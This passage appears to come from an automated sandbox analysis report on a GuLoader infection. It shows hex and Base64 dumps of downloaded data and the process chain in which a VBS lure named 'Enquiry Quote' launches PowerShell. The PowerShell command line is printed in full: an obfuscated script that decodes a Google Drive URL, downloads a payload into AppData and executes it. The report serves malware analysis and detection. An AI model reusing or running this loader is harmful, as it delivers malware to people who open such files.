              Data Ascii: cQGbcQGbu0g0GgDrArzu6wLAGANcJARxAZtxAZu5pSP2knEBm+sCIYCB6ahS+gDrAv6NcQGbgcEDLwRucQGb6wKJJHEBm3EBm7pVQ3UYcQGbcQGbcQGb6wJcpDHK6wL0wusC78SJFAvrAsbYcQGb0eLrAg7HcQGbg8EEcQGb6wJ30IH5eB7mAnzK6wJl/esCjLiLRCQEcQGb6wJ2EYnDcQGbcQGbgcP4RwIBcQGbcQGbusUTCnZxAZtxAZuB8qu
              2024-07-03 06:54:22 UTC4820INData Raw: 7a 4f 53 77 77 4d 7a 6b 73 4d 44 4d 35 43 6d 5a 46 35 35 52 37 57 65 4d 42 4c 43 6e 30 35 48 59 76 69 4a 4b 4f 59 76 6f 4a 4e 69 47 4e 6c 44 58 6f 75 50 62 6d 61 76 38 49 4d 44 47 6a 42 71 51 6d 4b 50 59 49 63 56 67 51 55 48 34 77 44 42 76 64 37 6f 78 39 4f 69 69 61 51 38 58 5a 62 54 6b 49 32 53 2f 53 38 50 6b 6f 49 76 4d 35 4c 44 41 7a 4f 53 77 77 4d 7a 6b 73 4d 44 4d 61 70 34 63 4b 6b 55 76 63 68 70 2f 6b 2f 6e 32 78 47 62 64 42 76 4d 73 71 4f 47 78 6f 31 53 6b 35 49 61 36 54 65 75 77 30 6c 7a 6b 73 4d 44 4d 35 4c 44 41 7a 4f 53 77 77 4d 7a 6b 50 44 52 6c 4c 6c 71 59 65 6f 4f 76 37 65 34 2f 49 79 70 36 6c 7a 48 30 36 47 53 6e 4b 42 5a 6c 68 4f 53 6b 33 53 4e 38 54 65 43 55 34 79 73 61 71 4a 42 30 32 69 68 66 76 4f 45 44 45 43 4e 61 68 58 4b 74 4d 52 66
              Data Ascii: zOSwwMzksMDM5CmZF55R7WeMBLCn05HYviJKOYvoJNiGNlDXouPbmav8IMDGjBqQmKPYIcVgQUH4wDBvd7ox9OiiaQ8XZbTkI2S/S8PkoIvM5LDAzOSwwMzksMDMap4cKkUvchp/k/n2xGbdBvMsqOGxo1Sk5Ia6Teuw0lzksMDM5LDAzOSwwMzkPDRlLlqYeoOv7e4/Iyp6lzH06GSnKBZlhOSk3SN8TeCU4ysaqJB02ihfvOEDECNahXKtMRf
              2024-07-03 06:54:22 UTC236INData Raw: 79 2b 66 77 73 59 46 4c 42 41 2f 79 78 45 6d 63 58 6f 73 73 68 35 5a 69 72 51 37 48 69 56 68 61 6b 66 7a 50 76 5a 68 6c 73 73 31 55 54 38 7a 52 39 2b 37 35 43 46 6a 36 77 47 76 71 2b 49 79 51 53 76 71 35 4d 66 54 6f 73 49 42 33 44 53 68 65 45 64 33 6c 67 4f 4e 6d 43 64 6c 4c 71 67 76 41 43 67 61 69 4f 6b 42 53 6a 7a 62 47 48 50 55 4a 30 68 4e 7a 54 6d 59 6e 4b 66 63 37 66 53 64 73 4f 45 33 51 6c 49 66 38 6e 62 31 42 79 4d 42 39 74 63 75 4b 76 38 48 2f 64 62 44 41 7a 4f 53 77 77 4d 7a 6b 73 4d 44 4d 35 4c 42 65 41 44 4a 6f 46 77 35 71 53 62 41 31 73 6e 37 6d 52 6c 44 6a 4c 31 38 54 4e 4d 34 69 51 47 43 50 6e 50 33 64 38 71 68 7a 46 59 58 56 74 4e 67 35 55 73 44 2b 51 63 6a 41 70 59 76 38 57 7a 48 30
              Data Ascii: y+fwsYFLBA/yxEmcXossh5ZirQ7HiVhakfzPvZhlss1UT8zR9+75CFj6wGvq+IyQSvq5MfTosIB3DSheEd3lgONmCdlLqgvACgaiOkBSjzbGHPUJ0hNzTmYnKfc7fSdsOE3QlIf8nb1ByMB9tcuKv8H/dbDAzOSwwMzksMDM5LBeADJoFw5qSbA1sn7mRlDjL18TNM4iQGCPnP3d8qhzFYXVtNg5UsD+QcjApYv8WzH0
              2024-07-03 06:54:22 UTC1324INData Raw: 36 4c 52 63 47 75 59 6f 6c 77 76 78 42 64 77 77 71 35 79 48 52 6b 33 74 76 2b 79 48 4a 44 47 62 6b 32 41 4c 4c 42 31 4a 52 31 41 68 2b 72 4a 33 6e 68 2b 78 4a 32 5a 6c 72 6d 47 76 33 73 44 76 4e 6d 57 63 35 4a 50 69 50 75 66 44 49 34 6e 53 7a 4f 53 77 77 4d 7a 6b 73 4d 44 4d 35 4c 44 41 7a 48 39 6b 39 72 67 6e 4e 64 49 50 6c 72 47 68 75 2f 63 62 6a 53 6c 79 53 56 4d 56 6d 4a 38 4b 55 6d 4b 4d 6a 36 47 46 4e 65 46 70 61 67 52 6f 72 4b 74 50 64 59 7a 6c 73 4d 41 6b 33 38 2f 45 7a 47 2f 33 7a 4a 78 63 2f 56 54 63 4b 4c 55 68 53 32 78 56 39 54 57 71 5a 41 4c 68 5a 57 2b 4d 76 32 32 67 37 34 6d 6d 71 39 75 56 79 75 31 4f 67 50 55 74 46 45 73 38 4d 4c 78 55 74 48 38 57 4d 65 6f 5a 44 47 71 4e 42 31 4f 45 32 74 78 77 71 5a 6d 50 6f 53 43 38 63 48 73 57 61 2b 69
              Data Ascii: 6LRcGuYolwvxBdwwq5yHRk3tv+yHJDGbk2ALLB1JR1Ah+rJ3nh+xJ2ZlrmGv3sDvNmWc5JPiPufDI4nSzOSwwMzksMDM5LDAzH9k9rgnNdIPlrGhu/cbjSlySVMVmJ8KUmKMj6GFNeFpagRorKtPdYzlsMAk38/EzG/3zJxc/VTcKLUhS2xV9TWqZALhZW+Mv22g74mmq9uVyu1OgPUtFEs8MLxUtH8WMeoZDGqNB1OE2txwqZmPoSC8cHsWa+i
              2024-07-03 06:54:22 UTC1390INData Raw: 77 47 6f 4f 37 4c 2f 68 65 5a 70 62 4b 41 64 4e 46 64 56 35 61 61 73 78 4b 61 68 53 63 30 70 4e 44 58 2b 4f 74 52 6e 6d 58 45 55 43 75 63 35 52 33 58 4f 38 78 35 42 70 4b 47 6a 45 35 75 56 7a 76 6a 55 6b 6a 48 34 78 6e 6e 57 57 4b 66 67 78 75 6f 6b 51 6c 57 57 45 35 4b 37 42 63 4c 31 4e 34 4a 51 32 44 41 75 59 44 41 45 47 6b 6b 34 6f 2b 75 4f 75 69 46 7a 56 32 55 35 2f 55 59 5a 4d 49 47 77 61 6b 39 35 73 74 65 50 32 46 58 32 4d 74 58 35 71 32 37 52 54 63 42 6e 65 34 39 65 6c 7a 43 61 53 6e 6c 36 4c 67 46 57 67 4d 54 4b 2b 77 47 62 37 54 53 59 36 44 6e 55 5a 4d 54 49 66 31 37 6d 39 6d 33 67 35 4a 38 33 7a 4c 55 51 45 6d 4b 42 6d 38 6a 75 53 37 32 61 32 36 6d 31 71 4c 37 30 4c 52 64 73 74 69 67 70 6a 35 57 54 2f 74 4f 69 7a 30 47 30 67 59 43 6d 36 42 45 47
              Data Ascii: wGoO7L/heZpbKAdNFdV5aasxKahSc0pNDX+OtRnmXEUCuc5R3XO8x5BpKGjE5uVzvjUkjH4xnnWWKfgxuokQlWWE5K7BcL1N4JQ2DAuYDAEGkk4o+uOuiFzV2U5/UYZMIGwak95steP2FX2MtX5q27RTcBne49elzCaSnl6LgFWgMTK+wGb7TSY6DnUZMTIf17m9m3g5J83zLUQEmKBm8juS72a26m1qL70LRdstigpj5WT/tOiz0G0gYCm6BEG
              2024-07-03 06:54:22 UTC1390INData Raw: 45 39 63 62 44 41 7a 4f 53 77 77 4d 7a 6b 73 4d 44 4d 35 4c 42 65 69 79 37 64 66 49 71 4c 4c 32 56 38 32 41 33 6c 35 2f 64 73 4f 76 43 77 63 59 2f 74 6c 73 52 46 4a 38 62 6e 65 4f 47 4f 30 56 6b 54 62 7a 31 45 7a 4f 53 77 65 6a 44 74 52 74 34 6b 4d 2f 50 45 7a 41 31 62 78 4d 7a 6b 76 77 66 37 42 62 44 41 7a 4f 53 77 77 4d 7a 6b 73 4d 44 4d 35 4c 42 49 73 6c 61 73 77 51 72 65 65 33 46 39 31 50 4c 48 57 42 58 2b 6d 39 43 55 4e 35 76 39 4e 72 2f 41 33 55 6d 77 77 4d 7a 6b 73 4d 44 4d 35 4c 44 41 7a 4f 53 77 53 6a 71 34 67 4e 37 57 53 74 7a 4a 6e 35 62 78 63 73 45 70 76 6c 34 75 46 50 6d 79 65 57 30 39 4a 4d 33 6b 73 45 6b 64 4b 44 62 75 35 44 31 68 44 65 41 2f 73 70 7a 6c 6a 42 68 77 35 4a 45 45 65 61 34 4b 44 48 2f 79 49 4f 47 58 63 34 73 71 43 78 74 6c 52
              Data Ascii: E9cbDAzOSwwMzksMDM5LBeiy7dfIqLL2V82A3l5/dsOvCwcY/tlsRFJ8bneOGO0VkTbz1EzOSwejDtRt4kM/PEzA1bxMzkvwf7BbDAzOSwwMzksMDM5LBIslaswQree3F91PLHWBX+m9CUN5v9Nr/A3UmwwMzksMDM5LDAzOSwSjq4gN7WStzJn5bxcsEpvl4uFPmyeW09JM3ksEkdKDbu5D1hDeA/spzljBhw5JEEea4KDH/yIOGXc4sqCxtlR
              2024-07-03 06:54:22 UTC1390INData Raw: 45 2b 6f 57 53 54 45 44 79 4b 68 5a 31 45 30 58 36 6d 53 63 6f 7a 45 44 7a 38 72 63 75 70 78 34 4f 53 44 4e 2f 43 32 6d 53 52 7a 4d 33 30 59 46 6a 30 57 50 71 30 6a 72 51 4f 62 69 41 57 2f 66 43 30 37 45 7a 39 33 57 45 64 6b 69 41 31 59 4b 2f 50 77 4d 35 47 64 50 44 34 49 31 45 5a 54 63 59 35 76 35 4b 2f 63 45 50 65 75 78 38 6c 6a 6b 73 4d 44 4d 35 4c 44 41 7a 4f 53 77 77 4d 7a 6b 4f 61 35 41 39 6a 48 52 69 41 72 4f 77 74 6b 30 34 7a 67 5a 51 2f 5a 79 6e 65 45 59 33 43 32 59 34 4a 42 30 45 74 62 36 39 75 47 77 2f 68 55 2b 74 61 42 46 36 67 76 46 62 6f 78 75 37 30 58 63 53 4b 42 49 44 37 75 4a 47 59 4a 4d 42 2f 32 75 6c 4c 69 33 65 77 45 44 42 63 54 30 75 58 74 68 6c 56 48 4e 59 53 4e 6c 4c 35 72 43 58 6e 36 4c 41 45 43 68 6d 75 71 6d 33 35 48 61 4a 74 30
              Data Ascii: E+oWSTEDyKhZ1E0X6mScozEDz8rcupx4OSDN/C2mSRzM30YFj0WPq0jrQObiAW/fC07Ez93WEdkiA1YK/PwM5GdPD4I1EZTcY5v5K/cEPeux8ljksMDM5LDAzOSwwMzkOa5A9jHRiArOwtk04zgZQ/ZyneEY3C2Y4JB0Etb69uGw/hU+taBF6gvFboxu70XcSKBID7uJGYJMB/2ulLi3ewEDBcT0uXthlVHNYSNlL5rCXn6LAEChmuqm35HaJt0
              2024-07-03 06:54:22 UTC1390INData Raw: 35 78 43 36 37 4d 55 78 76 32 4b 69 45 6f 33 47 4e 38 52 4e 79 6c 62 2f 33 63 64 6a 39 5a 38 30 6d 31 43 63 30 65 7a 75 64 42 50 55 33 6e 62 59 35 6c 51 65 41 4d 4a 53 64 42 44 61 49 6a 65 72 46 74 75 54 49 73 51 4b 42 68 7a 73 69 4d 4d 59 65 67 33 67 50 4c 33 41 42 54 54 72 70 69 72 47 54 6e 6d 32 72 33 54 4f 6b 6f 62 4e 2b 30 77 4a 35 65 43 2b 77 56 76 6a 45 71 52 6f 43 6d 72 55 30 6d 66 56 61 68 31 54 45 79 31 62 2f 51 53 55 30 4f 56 38 53 63 63 75 4e 63 52 51 65 35 30 31 46 68 59 4c 44 75 6a 6e 4b 65 54 53 39 38 33 4b 6a 4d 68 52 4e 4b 49 6a 4e 73 55 4b 49 57 42 51 4d 75 68 30 6c 32 39 50 34 75 4e 59 76 64 45 4d 2b 78 6f 37 64 52 4f 71 77 71 36 4b 67 70 67 74 47 76 6c 66 63 77 76 39 5a 46 46 37 37 59 47 57 7a 42 4e 41 79 70 73 58 6c 57 6d 61 7a 45 62
              Data Ascii: 5xC67MUxv2KiEo3GN8RNylb/3cdj9Z80m1Cc0ezudBPU3nbY5lQeAMJSdBDaIjerFtuTIsQKBhzsiMMYeg3gPL3ABTTrpirGTnm2r3TOkobN+0wJ5eC+wVvjEqRoCmrU0mfVah1TEy1b/QSU0OV8SccuNcRQe501FhYLDujnKeTS983KjMhRNKIjNsUKIWBQMuh0l29P4uNYvdEM+xo7dROqwq6KgpgtGvlfcwv9ZFF77YGWzBNAypsXlWmazEb
              2024-07-03 06:54:22 UTC1390INData Raw: 68 39 54 52 5a 68 53 47 38 2b 46 63 52 51 57 78 77 56 48 64 54 37 72 4c 53 62 75 61 38 42 43 37 51 34 54 44 59 6b 6e 49 32 38 63 53 64 75 55 39 43 79 35 69 69 42 43 56 59 57 4f 59 41 4e 65 2b 4e 47 59 4d 4e 76 54 4f 61 43 63 55 39 45 6b 38 41 55 42 66 45 67 52 32 57 7a 75 4e 30 4f 75 78 4e 38 44 6b 73 4d 44 4d 35 4c 44 41 7a 4f 53 77 77 4d 7a 6b 4e 67 36 59 6b 6f 4f 37 68 6c 4f 57 7a 78 2f 58 37 38 74 70 52 70 62 78 74 67 43 73 33 59 37 5a 4b 35 5a 32 38 58 4c 78 4b 72 49 4f 7a 76 6d 44 4e 45 45 69 63 6a 34 42 45 32 56 32 6b 4d 6e 6e 53 30 45 36 32 73 61 72 73 47 56 32 48 77 72 59 72 45 6e 43 52 79 54 52 51 5a 76 63 31 4c 39 4b 4c 57 75 68 54 47 54 47 51 68 54 30 41 48 37 77 48 37 2b 69 47 4f 50 33 75 64 6c 47 44 52 71 4c 37 69 6a 6f 30 37 54 41 63 74 46
              Data Ascii: h9TRZhSG8+FcRQWxwVHdT7rLSbua8BC7Q4TDYknI28cSduU9Cy5iiBCVYWOYANe+NGYMNvTOaCcU9Ek8AUBfEgR2WzuN0OuxN8DksMDM5LDAzOSwwMzkNg6YkoO7hlOWzx/X78tpRpbxtgCs3Y7ZK5Z28XLxKrIOzvmDNEEicj4BE2V2kMnnS0E62sarsGV2HwrYrEnCRyTRQZvc1L9KLWuhTGTGQhT0AH7wH7+iGOP3udlGDRqL7ijo07TActF
              2024-07-03 06:54:22 UTC1390INData Raw: 6a 76 6b 48 51 34 4b 5a 70 69 79 59 6f 39 59 77 57 46 77 6b 73 32 6b 65 33 45 6b 63 63 74 52 64 54 64 65 77 5a 31 53 64 70 72 71 48 37 35 49 50 79 47 32 72 78 54 53 6e 35 32 63 47 4b 57 79 36 50 6f 51 53 63 43 6a 72 61 49 36 37 48 62 55 65 53 77 77 4d 7a 6b 73 4d 44 4d 35 4c 44 41 7a 4f 51 32 62 36 4a 44 4e 79 45 5a 68 32 5a 64 48 77 78 48 46 37 54 56 68 43 30 70 5a 6a 6d 68 58 52 7a 33 4d 35 39 76 4c 5a 44 4f 35 4c 41 4d 67 36 6c 35 42 44 54 34 44 4b 37 32 69 68 6e 47 47 77 67 48 73 6e 4d 6a 39 61 68 63 6e 4d 45 59 41 44 77 4a 70 64 67 41 49 71 41 79 62 2f 76 64 30 4d 7a 43 2f 6d 42 65 68 6c 79 78 51 39 68 42 75 59 79 59 42 4c 53 38 4d 62 57 6b 47 62 6b 73 78 4c 59 4b 5a 6f 49 4c 59 6b 45 2b 70 79 2b 39 67 47 56 79 32 2b 4f 4a 30 5a 5a 51 62 56 62 42 32
              Data Ascii: jvkHQ4KZpiyYo9YwWFwks2ke3EkcctRdTdewZ1SdprqH75IPyG2rxTSn52cGKWy6PoQScCjraI67HbUeSwwMzksMDM5LDAzOQ2b6JDNyEZh2ZdHwxHF7TVhC0pZjmhXRz3M59vLZDO5LAMg6l5BDT4DK72ihnGGwgHsnMj9ahcnMEYADwJpdgAIqAyb/vd0MzC/mBehlyxQ9hBuYyYBLS8MbWkGbksxLYKZoILYkE+py+9gGVy2+OJ0ZZQbVbB2


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:02:52:40
              Start date:03/07/2024
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs"
              Imagebase:0x7ff6b1200000
              File size:170'496 bytes
              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:15
              Start time:04:17:52
              Start date:03/07/2024
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,cbieN,]Sc=,o$XyKThoS oGkr.ad NiSen,oaTetfaf nr Ee Um dsU t ,iTrlUslUdi DnCegTreUmr tnTie SsPe1Sa2Mi8 K ');$Slutafregning=Isoelectric 'Br$ SSa.y,alS lSuoGlg.tiTos Kt ,iKuc.na ol ,.OmDN,oD,w ,n ,lMeo aa ,dSpF ,i .lF eor(Hu$MeF BoSkrf.ss m EtFoebusA.,Em$OvCD,o RaHer,krB.a UnK g oeN,m SeStn .tMa) T ';$Coarrangement=$Selverkendelsers[0];Isoleringsmateriale (Isoelectric 'In$U gK lmao HbSnaSpl.r:T OAcp.ibL,rDruHugBieNet a= (BlT Ue isAltS -AgPSaaTat ChDi E $FaCKvoMea Nr r DaEknEtgBaeA mR,eLan.at S)Ne ');while (!$Opbruget) {Isoleringsmateriale (Isoelectric 'P.$Sig.ulEmo Bbe,aT l F:FoB recag ,iI,nNon,aeUdrNo= ,$A.tBlrKyuOpe a ') ;Isoleringsmateriale $Slutafregning;Isoleringsmateriale (Isoelectric 'seSpotDiaHer Nt ,-AsSU,lUde ,e lp n Ha4 H ');Isoleringsmateriale (Isoelectric ' B$Brg ClDoo,obSpaHel.n: cORep.ybS.rVauThgUneSntco= P(,nT,oeFosT,tRi-R.PAfaRetAph T Ge$SmC,po.uaafrDorUna.snOvgRee emU.eThnOmtKu)Sk ') ;Isoleringsmateriale (Isoelectric 'G,$ NgSvlBloPibDoaKal.i:,nHByeFrnPesDii.lgFlt as Pe ArInk BlK.rA iV.nS gSgeFln,ls .=Pl$P gUnl GoT.bMoaOplT,:NoSAvtNoyUdx.oiFeaFonf +.r+ Z%Ko$HyNDvaA,v,vl.iec r.y.VecDio.duFln Et n ') ;$Forsmtes=$Navler[$Hensigtserklringens];}$Tilvendelsens237=305549;$Urocentrummets=26395;Isoleringsmateriale (Isoelectric 'Po$.hgPrlReo ,bEmaUpl.a:ArS k FiasdJooK.oHe Op=Bi TyGChe t V- CCFro.hnUnt.peCon TtKo T$PrC,joBeaFlr.orO aFen.rg SeCam DeFonD tsp ');Isoleringsmateriale (Isoelectric 'Kl$Ang TlS,oPobB.aValSm:UnIArnCrvTrofilLevSle r De ,dRee.i I=po A [,fS yBes rtMoeLomBe.I C RoB,nCov UeKor rtBa]Pi:c.: bFDarsto UmT.BB.abusG.eFi6Er4,aS .tEnr Bi nthg .(,e$AmSRekKhi dJaoFio ,),u ');Isoleringsmateriale (Isoelectric 'Ud$IlgmelCooUnb TaRelVi:K.IdynUndJusMakMou idVesFos.rtM.nHai NnLag SeDir.ssFe Pe=.o Su[ BSZoyBas .tNyePrmAc.StTSieUdxVetOr..oEIsn.icMaoGedUniinnUdg .]Co:Ar:AnAMaSS,C ,I,mI S.A GDae.atDiSUntRerUni En WgSp(Fe$ iIHyn ,v,uo.tl uvSae ,rDieS dCoeK.) P ');Isoleringsmateriale (Isoelectric 'La$T,gDilHao MbG aPsl,i: GNdeeSumGuaRyt koafcMey GsCet L= o$,eIScnPed FsHykdeu odAfs VsTet Kn IiSanOdgK e ,r asTa.O sseuRibKls ctSerPriDonKlgFl(Fu$CaT Li,alfrvRae InindCieSilFos deLin .sBl2be3 M7C,,Sn$ayU FrM,oAacDue Sn Kt.ar muV m fm UeH tP,sYv) , ');Isoleringsmateriale $Nematocyst;"
              Imagebase:0x7ff741d30000
              File size:452'608 bytes
              MD5 hash:04029E121A0CFA5991749937DD22A1D9
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000F.00000002.2617063017.000001FADEC6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high
              Has exited:false

              General

              Target ID:16
              Start time:04:17:52
              Start date:03/07/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff75da10000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              General

              Target ID:17
              Start time:04:17:54
              Start date:03/07/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"
              Imagebase:0x7ff7454d0000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:19
              Start time:04:18:02
              Start date:03/07/2024
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,cbieN,]Sc=,o$XyKThoS oGkr.ad NiSen,oaTetfaf nr Ee Um dsU t ,iTrlUslUdi DnCegTreUmr tnTie SsPe1Sa2Mi8 K ');$Slutafregning=Isoelectric 'Br$ SSa.y,alS lSuoGlg.tiTos Kt ,iKuc.na ol ,.OmDN,oD,w ,n ,lMeo aa ,dSpF ,i .lF eor(Hu$MeF BoSkrf.ss m EtFoebusA.,Em$OvCD,o RaHer,krB.a UnK g oeN,m SeStn .tMa) T 